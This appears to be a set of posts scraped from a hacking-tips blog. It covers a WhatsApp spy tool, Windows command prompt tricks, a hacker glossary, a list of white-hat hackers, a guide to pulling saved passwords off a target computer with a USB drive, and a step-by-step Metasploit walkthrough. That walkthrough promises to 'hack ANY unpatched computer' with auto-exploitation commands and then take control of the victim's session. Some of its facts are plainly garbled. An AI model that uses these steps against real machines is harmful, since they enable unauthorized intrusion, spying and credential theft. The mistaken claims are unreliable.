Earlier it was reported that a serious security Bug in WhatsApp allows strangers to view the photos of users of WhatsApp and could even recover the deleted ones.TrickedPC even gave a Guide of Hacking WhatsApp Easily.The bug was discovered by a 17-year old kid and was acknowledged by WhatsApp team itself. But, Facebook acquired WhatsApp seems to learn it the hard way and the new bug in WhatsApp allows Strangers to track your entire activities on WhatsApp by exploiting the built-in flaw of mobile messaging Service.


This Spy bug was discovered by a Dutch Developer and he even developed a Tool for Spying WhatsApp activities. This tool is named as WhatsSpy Public which allows strangers to keep a check on your activities of WhatsApp. According to the Dutch developer, the tool for Spying WhatsApp was made just to expose what he believes as a serious security bug in WhatsApp Privacy Option.

How Can We Spy On WhatsApp ??


WhatsApp Spy Tool exposes worst ever bug in WhatsApp.WhatsSpy Public, a WhatsApp Spying App allows you to track various private information of any WhatsApp User. WhatsSpy Public tool allows you to track user’s status updates,their profile pictures and even their Profile Pictures.


Maikel Zweerink,the developer who developed WhatsApp Spy Tool say,”You may think now you’ve set all options to “nobody” you are safe, privacy-wise, but nevertheless I can still track your moves on WhatsApp”.He further added that,”The ability for a complete stranger to follow your in-app status is pretty creepy and might be abused already. This is not a ‘hack’ or an ‘exploit’ but it’s broken by design.”


What is at Stake For WhatsApp ??

Well, of course more than 700 million WhatsApp monthly users privacy are at stake – most of them being the children which uses WhatsApp. Thankfully, the WhatsApp Spying WhatsSpy Public will not show any of the message that you send. WhatsSpy Public tool was first tested hands-on by the developer himself on his own brother.”I called him and told him and he was completely shocked, since all his privacy options were set to ‘nobody’,”said Zweerink, a Dutch Developer.

Where to get WhatsApp Spying tool ??

Zweerink may be saying that he made the WhatsApp Spying tools just in order to make WhatsApp aware about their ‘Broken Privacy Settings’ but he has put the Software Online for Public use(Of course, setting it up will require some technical Know-How, not a cakewalk). When we tested WhatsApp Spying Tool, WhatsSpy Public, we found it pretty much working. In the interface, it can track and show you a Timeline of Users Online Status and in other, it shows Their Profile Pictures.


What to WhatsApp Has to Say About It ??

WhatsApp is still tight-lipped regarding any broken Privacy Bug Issue , but one thing is crystal clear, WhatsApp is becoming Buggy day-by-day and Facebook owned WhatsApp need to look for their users privacy.


Command Prompt is one of the most powerful tools in Windows; but sadly, it is also the most ignored one. Things were not always like this; but with the advent of GUI based operating systems, people started feeling that computing through command based tools was boring. This ultimately lead the command prompt into obscurity.

However, the command prompt is not useless. In fact, it can be pretty useful. This article provides some excellent tricks, secrets and hacks that will make you realize that the Windows Command Prompt is not only useful but also a tool that you should definitely give more respect to.



1-Watch ASCII version of the Star Wars Episode IV movie

Surprised yet? You can watch an ASCII version of the full Star Wars Episode IV Movie right in your command prompt window. Just open command prompt, type a small code and the movie will start playing immediately. Read the complete instructions here.

2- Create Matrix falling code effect

Have you watched “The Matrix”? Of course, you have. Then, you already know what I am talking about. In case you still don't know what I mean, take a look at this image! You can create the same effect in command prompt using just a few lines of code. Head over to this post for instructions.


3- Make Folders that you cannot delete

Are you tired of accidentally deleting important folders? Well, if you are, you can learn how to make undeletable folders here.

4- Shutdown your computer giving a funny reason

What if your computer shuts down saying that it is tired and doesn't want to work anymore? It would be fun, wouldn't it? You can do so by reading the instructions here.


5- Know your IP address, DNS Server's address and a lot more about your Internet Connection
Command Prompt can even let you know your IP address. Just type ipconfig/ all in the command prompt and press Enter. Along with your IP address and DNS servers, command prompt will also return a ton of information like your host name, primary DNS suffix, node type, whether IP Routing ,Wins Proxy, and DHCP are enabled, your network adapter's description, your physical (MAC) address etc .

6- Know if your neighbours are stealing your WiFi connection


command prompt codes Command Prompt can let you know if someone is connected to your Local Area Connection and using it. Just follow the steps:-
1) Open your browser and visit http://192.168.1.1 or http://192.168.0.1 depending on your router.
2) Find the tab that mentions “Attached Devices” or something similar.
3) Find the computer name, IP address and MAC Address (sometimes called Physical Address or Hardware Address) of your computer using the previous trick.
4 )Compare it with those displayed by your router in Step 2. If you notice some strange devices, then your neighbour has been sneaking in on your internet connection and it is best to add a password.

7- Know if someone is hacking your computer/ Trace a Hacker

Command Prompt hacks Want to know if someone is hacking your computer? Command Prompt can help you find if someone you don't know is connected to your computer stealing private data. Just execute netstat -a and the command prompt will return a list of computers that your computer is connected to. In the results returned, Proto column gives the type of data transmission taking place (TCP or UDP) , Local address column gives the port with which your computer is connected to an external computer and the Foreign Address column gives the external computer you are connected to along with the port being used for the connection. State gives the state of the connection (whether a connection is actually established, or waiting for transmission or is “Timed Out”).

These tricks work on Windows 8.1, Windows 8, Windows 7, Windows Vista, Windows XP and all previous versions of Windows.

Keep Visiting


before doing hacking lets know somthing about it.


* What is Hacking?

* Who is a Hacker?

* Who is a Cracker?

* Who is a Script Kiddy?

* What skills do I need to become a Hacker?

* What is the best way to learn Hacking?

* How do I secure my computer from being Hacked?

What is Hacking?


Computer hacking is the practice of modifying computer hardware and software to accomplish a goal outside of the creator’s original purpose.Hacking is the art of exploiting the flaws/loopholes in a software/module.Since the word “hack” has long been used to describe someone who is incompetent at his/her profession, some hackers claim this term is offensive and fails to give appropriate recognition to their skills.


Who is a Hacker?


A Hacker or White Hat Hacker, also known as Ethical Hacker, is a Computer Security expert, who specialise in penetration testing, and other testing methodologies, to ensure that a company’s information systems are secure. Such people are employed by companies where these professionals are sometimes called Sneaker.

Who is a Cracker?

Black Hat Hackers, who may also be known as Crackers, are Hackers, who specialise in unauthorized penetration of information systems. They may use computers to attack systems for profit, for fun, or for political motivations, as part of a social cause. Such penetration often involves modification and/or destruction of data, and is done without authorization. They also may distribute computer viruses, Internet Worms, and deliver spam through the use of bot nets.

Who is a Script Kiddy?

A script kiddy is a wannabe cracker. These individuals lack knowledge of how a computer really works but they use well-known easy-to-find techniques and programs or scripts to break into a computer to steal porn, music files, SPAM, etc.
What skills do I need to become a Hacker?

There is no magic to Hacking, but like anything else that is worthwhile it takes dedication, a willingness to learn.It is most important to have a good knowledge of topics such as Operating system and it’s working,Computer networks,Computer security and of course Programming.It’s not possible to become a hacker overnight.It’s the skill developed over a long time.


What is the best way to learn Hacking?

The best way to learn Hacking is to start learning about the basics of hacking right from now.There are many books about Hacking that are available today.But before you start learning about the details you must have a basic skills of Programming and knowledge of Computer network security.Internet is the best source to learn about hacking.

How do I secure my computer from being Hacked?


Having a basic knowledge of computer security and related topics such as virus,Trojans,spyware,phishing etc. is more than enough to secure your computer.Install a good antivirus and a firewall.

Keep Visiitng

Ok after completing my 1st internals i would like to wright a article about Hacking USER NAME & PASSWORD through USB drive(pen drive) in easy steps.yes it is possible to hack passwords through USB drive to do this 1st you need to access the target computer then it is possible to hack passwords.


What is concept behind this Hacking..?

As we all know that windows stores the USER NAME & PASSWORDS of many website that are visiting in daily & we don't like to enter the user name & passwords again & again so what we do on this time is we just check on Remember me on that time.so when we check on that box windows stores your user name & password but we can't easily see the stored passwords in your browser.we can restore this saved passwords by using some software.

Which are the passwords that can be able to access by using this hacking tools..?


All saved passwords in your computer can able to hack using this hacking tools.
ex: yahoo messenger password, Outlook Express password, passwords stored in the browsers link IE & Firefox.

Hacking Tools with there functions:

IE PassView: IE PassView is a small utility that reveals the passwords stored by Internet Explorer browser. It supports the new version of Internet Explorer 7.0, the Beta version of Internet Explorer 8.0, as well as older versions of Internet Explorer, v4.0 - v6.0

MessenPass: MessenPass is a password recovery tool that reveals the passwords of the following instant messenger applications:

* MSN Messenger
* Windows Messenger (In Windows XP)
* Windows Live Messenger (In Windows XP And Vista)
* Yahoo Messenger (Versions 5.x and 6.x)
* Google Talk etc

MessenPass can only be used to recover the passwords for the current logged-on user on your local computer, and it only works if you chose the remember your password in one of the above programs.


Mail PassView: Mail PassView is a small password-recovery tool that reveals the passwords and other account details for the following email clients:

* Outlook Express
* Microsoft Outlook 2000 (POP3 and SMTP Accounts only)
* Microsoft Outlook 2002/2003/2007 (POP3, IMAP, HTTP and SMTP Accounts)
* Windows Mail
* Yahoo! Mail - If the password is saved in Yahoo! Messenger application.
* Hotmail/MSN mail - If the password is saved in MSN/Windows/Live Messenger application.
* Gmail - If the password is saved by Gmail Notifier application, Google Desktop, or by Google Talk & etc.


For each email account, the following fields are displayed: Account Name, Application, Email, Server, Server Type (POP3/IMAP/SMTP), User Name, and the Password.

Protected Storage PassView: Protected Storage PassView is a small utility that reveals the passwords stored on your computer by Internet Explorer, Outlook Express and MSN Explorer. The passwords are revealed by reading the information from the Protected Storage.

PasswordFox
: PasswordFox is a small password recovery tool that allows you to view the user names and passwords stored by Mozilla Firefox Web browser. By default, PasswordFox displays the passwords stored in your current profile, but you can easily select to watch the passwords of any other Firefox profile. For each password entry, the following information is displayed: Record Index, Web Site, User Name, Password, User Name Field, Password Field, and the Signons filename.



Keep Visiting
 Let’ begin with who is a white hacker? First of all, white hacker is good, conscientious and ethical hacker, who tries to save the balance of the universe by doing good works. White hats are very useful and it goes without saying they constantly compete with black hats. White hats hackers can be compared with cats, which catch mice, namely they look for defects of the systems. Besides, white hats are computer security guards, they test systems for the level of protection and moreover they improve their skills. Mainly, white hats don’t look for fame or money, they serve in society.

It is undeniable that sometimes black hat hackers became white hackers and prevent crimes, because they perfectly know what to do. So who are they main and most famous white hats of all times?


Before you move on further with this post you might like to read about Top 6 Black Hat Hackers.


1. Stephen Wozniak

Stephen Wozniak white hat hacker
Stephen Wozniak, The Great Woz, as many hackers call him, moreover,  he is “the second half” of Steve Jobs and Apple empire, became as an icon and inspiration for many people, who never lost interest in computer technology. What did he actually do? It is well-known today that he made free long-distance calls possible exploring so-called blue boxes, at the time, when high technology has made its first baby steps.  Nevertheless, one should accept that Woz is an independent developer and worked for the good of people. Currently, Stephen Wozniak is preaching charity and provides new technologies. One can truly say that Stephen Wozniak made a difference in this world and he deserves to be called as a white hat hacker.

2. Tim Berners-Lee 

Tim Berners-Lee white hat hacker
Tim Berners-Lee is well-known around the world as fonder of the web we use - World Wide Web. No wonder that this man invented his first computer using iron, as they say necessity is the mother of invention. Doubtless, his innovating had led him to becoming a president of the Open Data Institute in 2012.

3. Linus  Torvals 

Linus Torvals white hat hacker
Linus  Torvals created Linux operation system, which many of us use. At the beginning, this system was about to be called as Freax, using the combination of words “ freak” and “free”. Luckily, nowadays we know it as Linux.  As Linus himself once said that all he wanted to have fun doing something he really enjoys. This seems to confirm the idea that it is the great result of having fun!


4. Tsutomu Shimomura 

Tsutomu Shimomura  white hat hacker
Tsutomu Shimomura is also a very good example of a white hat hacker. The bottom line is he tracked down another hacker – Kevin Mitnick, who actually was a black hat hacker. However, later on he has entered the ranks of white hats. Tsutomu Shimomura caught Mitnick with flying colors hacking Mitnick’s phone. Good job catching “black knight”. Currently Shimomura is CEO and CTO of Neofocal System.

 

5. Richard Matthew Stallman 

Richard Matthew Stallman white hat hacker
Richard Matthew Stallman is known also by his initials – RMS. His policy is to give users freedom of usage software as well as education, freedom of voice and choice. He has developed Free software foundation, GNU project, which allows use computer and its devices for free
What is more, RMS is a founder of copyright concept. Among the list if his merits are 14 doctorates and professorships.

6. Johanna Rutkowska.

Johanna Rutkowska white hat hacker
When it goes about technology and computers, most of the time we mentioned men. Women weren’t pathfinders in this area, however, they have done enough to be mentioned among outstanding white hats. Thus, this smart lady could hide root kits in software and hardware and to make them invisible to a naked eye. One must admit the talent of he woman. To draw the conclusion, one can say that enumerated people have brought its own contribution in foundation and innovation of computer technologies. Until the world has such brainy “white knights”, its save.


Keep visiting 

Hello everybody! I am here to show you this magical tool called Metasploit that allows you to hack ANYunpatched computer with only it's IP. Lets begin...

1.) First you need to download Metasploit. The most up-to-date version is FREE at metasploit.com.
2.) You need PostgrSQL for your database. Download here: http://www.postgresql.org/. Make sure you use all the defaults or Metasploit woun't work!

3.) Now lets get down to buisness... After installing both tools, open up the PostgrSQL admin gui (start -> all programs -> PostgreSQL 9.0 -> pgAdmin III). Then right-click on your server (in the left hand box) and click connect. Remember to keep this window open the whole time. You will also need the pass you chose to use in step 5...

[Image: pgadmin.bmp]

4.) Time for some hacking! Go to start -> all programs -> Metasploit Framework, and then open the Metasploit gui. Let it load untill it look like this:


[Image: metasploit.bmp]

5.) Now, in the window type:

db_connect postgres:ThePassYouChose@localhost:5432


The first time you do this you will see lots of text flash buy. Don't wory, this is normal.

6.)Type db_host to make sure you are connected correctally.

7.)Now type this:

db_nmap 000.000.000.000

Make sure you put the ip of the computer you are trying to hack in the place of 000.000.000.000...

8.) Now we get to the fun part; the automatic exploitation. Just type db_autopwn -t -p -e -s -b , watch the auto-exploitation start, go play Halo for a while, and then come back...

9.) After the exploitation is done, type sessions -l to see what the scanner found. If all went well, you should see a list of exploits.


10.) Now we get to use the exploits to hack the computer! If you will notice, all of the exploits are numbered, and they all have obvious names (i. e., reverseScreen_tcp). In order to use an exploit, type this:

sessions -i ExploitNumber

___________________________________________________________

The features of Metasploit are mutch like a rat. Once you get into someone's computer, you can see their screen, controll their mouse, see what they type, see them, etc.

Keep Visiting
Previous PostOlder Posts Home